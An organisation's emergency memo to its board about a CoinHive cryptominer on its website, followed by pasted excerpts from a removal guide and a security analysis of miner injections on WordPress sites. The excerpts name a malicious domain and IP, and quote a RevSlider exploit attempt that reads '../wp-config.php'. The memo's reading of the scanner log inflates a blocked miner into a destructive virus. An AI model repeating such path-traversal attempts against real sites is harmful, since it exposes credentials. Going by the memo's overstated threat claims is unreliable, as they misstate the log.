Emergency Memorandum 12/27/17, early hours
To: USL Board (by email & @ www:UniformedServicesLeague.org/HackAttack)
From: Management Team (Executive Director, Chairman & Principle Consultant)
Ref: Hack Attack (Near-crippling attack on USL website, Late Night Counter-attack)
Result: Successful defense but attacks on USL website expected to be ongoing
Issue: Uniformed Services League website came under malicious attack evening of 12/26. The invader penetrated USL website, infected it, threatened to infect visitors.
Solution Summary. USL should consider purchase of (expensive) cyber security software and/or retain expert computer technicians as a result of attack which threatened to totally shut down website UniformedServicesLeague.org. Urgent need for additional funding in order to prevent destruction of website or at least to better monitor website to report future attacks and enable USL to mount defense and counter attack.
If we fail to act, then continued internet attack on USL website could result in infection (virus attack) by a worse malicious program. USL could be black listed on the search engines meaning that they will report that we are an unsafe site and prevent our supporters and other visitors from reaching our website and reading our message. Worse still, search engines could simply delist USL so that it does not appear on search engine results in the future.
The virus scanner log, reported in cryptic English, not comprehensible except to a programmer, a developer or technician, passed on this message. Not comprehensible by most, except with a translation. Here’s the message:
Time;Scanner;Object type;Object;Threat;Action;User;Information;Hash;First seen here
12/26/2017 8:41:35 PM;HTTP filter;file;https://coinhive.com/lib/coinhive.min.js;JS/CoinMiner.D potentially unwanted application;connection terminated;Ron-Z600pc\Ron;Threat was detected upon access to web by the application: C:\Program Files (x86)\Mozilla Firefox\firefox.exe (54EADC78AA30324B87256E626A769B6BBE4E4580).;116CB0BD8425DEE9FB6E47C6FE119FA63D1B0E29;
Here’s the English translation.
- Don’t go to this website (UniformedServicesLeague.org).It is dangerous. At best, this is a PUP – a “potentially unwanted program” that could infect every visitor to our website. At worst, it is a virus which will attack and hurt the ability of every visitor to access their own computer, and the internet, or even damage or destroy our website, effectively erasing our message from the internet by hostile invading forces.
- In the event this invasion of our website is not countered and eradicated, then at the least, visitors will be turned away from our website and our voice and message to them, silenced.At worst, visitors will find that the penalty for visiting our website is that their home computer could become infected, no longer work properly, important files on their computer could become either inaccessible or hard to access. The visitor whose computer became so infected, might then infect others from their computer over the internet.
- The internet community would, if this hostile hacker attack were not immediately fixed by finding and destroying the virus invader, ban USL website and prevent people from visiting it.This surprise-internet-hack-attack would literally destroy our voice on the internet, if we did not find a way to kick out the internet invader and block them from sneaking onto our website again.
- Hire expert, more advanced programmers to search out and destroy the invader.Make use of more advanced programs than we have had before this date, to assist in this task. Initial counter attack successful, but the vulnerability for future attacks, remains. Need more funding for continued vigilance by expert technicians and ongoing defense work in order to keep UniformedServicesLeague.org website accessible for visitors now that we have been subjected to ongoing attack by internet hack attack and have been warned of future attacks.
This report developed by:
- (Credits).USPPC Executive Director worked on this problem late evening and into the morning, along with USPPC Sec/Treasurer in his capacity as a technician and programmer and principal consultant. All work reviewed and approved by Chairman. Total expenses could have been $1000, $2000 or more but for tonight’s emergency did not exceed $100 as a favor to USL in this emergency. Additional funding needed on an ongoing basis to maintain security and defense after what appears to be targeting of Uniformed Services League by malicious forces on internet determined to hurt us at best, or outright destroy our website and our voice.
Additonal information follows, on the minimum damage done to us tonight. Much worse is expected if this targeting of USL continued, and we have been warned.
How to remove CoinHive Miner Trojan (Virus Removal Guide)
By Stelian Pilici on September 28, 2017
The Coinhive Miner Trojan is commonly bundled with other free programs or browser extensions that you download off of the Internet. Unfortunately, some free downloads do not adequately disclose that other software will also be installed and you may find that you have installed Coinhive Miner without your knowledge.
Once this malicious program or browser extension is installed, the Coinhive Miner will inject an in-browser Monero miner from coin-hive.com/lib/coinhive.min.js, which uses more than 50% of your CPU’s power and graphics cards power. What this means, is that when the miners are running you will find that your computer is running slower and games are stuttering or freezing because the Coinhive Miner Trojan is using your computer’s resources to generate revenue for themselves.
This will cause your CPU to run at very hot temperatures for extended periods of time, which could shorten the life of the CPU.
When infected with the Coinhive Miner, other common symptoms include:
- Very high CPU and graphics cards usage
- Web browser is using more than 50% of the CPU power
- PC connects to coin-hive.com/lib/coinhive.min.js
- Windows minimize and maximize slowly, and programs run slower
- Programs don’t launch as quickly
- General slowness when using the PC or Web Browser
Hacked Websites Mine Cryptocurrencies
Cryptocurrencies are all the rage now. Bitcoin, altcoins, blockchain, ICO, mining farms, skyrocketing exchange rates – you see or hear this every day in the news now. Everyone seems to be trying to jump on this bandwagon.
Visitor’s computer CPU load
Like with any other type of website monetization, this one is prone to abuse, especially in its early stages. It didn’t take long for us to encounter the CoinHive miner installed on hacked sites. It’s a natural move for bad actors who similarly abuse other legitimate means of website monetization, for example, installing their own ad or affiliate codes to third-party sites.
Malicious Injection with CoinHive Miner
In this case, a webmaster contacted us and said that some of their site visitors noticed high processor load while visiting the site. Some of them even identified the CoinHive cryptominer there. Indeed, the HTML code of web pages contained this code in the footer section:
That security.fblaster[.]com script loaded the CoinHive Miner script
CoinHive miner on security.fblaster[.]comIt’s not the official way to use the CoinHive Miner (which is supposed to be loaded from lib/coinhive.min.js on their own site) but if you check the first long line of the “security.fblaster[.]com” script you’ll see that it’s identical to the CoinHive’s own coinhive.min.js. The rest of the lines are the part that initializes the miner using the site’s unique key and starts it on page load.
We searched for security.fblaster[.]com and found very similar injections on a few other sites.
The names of the scripts are made to appear legitimate so that the webmaster doesn’t get alarmed when seeing them. Moreover, a couple of sites we investigated referenced the domain names of the infected sites within the malicious script – making them look even more as if they belong on the sites.
Those scripts have been already removed from most of the infected sites, but one site still had that live script and it loaded the same crypto-miner with another site key: XMzUIs3Jx7qkRuPPfxG4I5k4AdXfQV6D.
Cryptominer Re-uses Old Infection
We checked the infected sites on the Wayback Machine and tracked down that injection to the end of 2016. We also noticed that the IP address of the “security.fblaster[.]com” server (220.127.116.11 – Digitalocean Amsterdam) was mentioned in a tweet about an attacks that tried to exploit RevSlider vulnerability:
#RevSlider #soaksoak #malware attempts from 18.104.22.168 (NL) ../wp-config.php
Moreover, on the site whose webmaster contacted us, the script was only injected on September 19th, 2017 (which was confirmed by Google cache). We also noticed that the script had a long number in the ?id= parameter that changed on every page load, while in scripts on other sites it was always ?id=1.
It appears as if this is not a new infection, but since the attackers already control the “security.fblaster[.]com” server, they can easily modify the malicious script without having to change anything on sites that they had infected previously.
Since the cryptocurrency miner only produces meaningful results on sites with lots of visitors (or on a large number of less popular sites), they began to inject the miner to new sites just a few days ago. At this point the security.fblaster[.]com infection is not massive (although there are other similar attacks as you’ll read below) as we don’t see it on many other sites so probably the attackers are still testing this approach.
Infected Files on WordPress
Now let’s see how this infection works on the server. A quick scan revealed modified core WordPress files.
The first modification was discovered at the top of the wp-admin/admin-header.php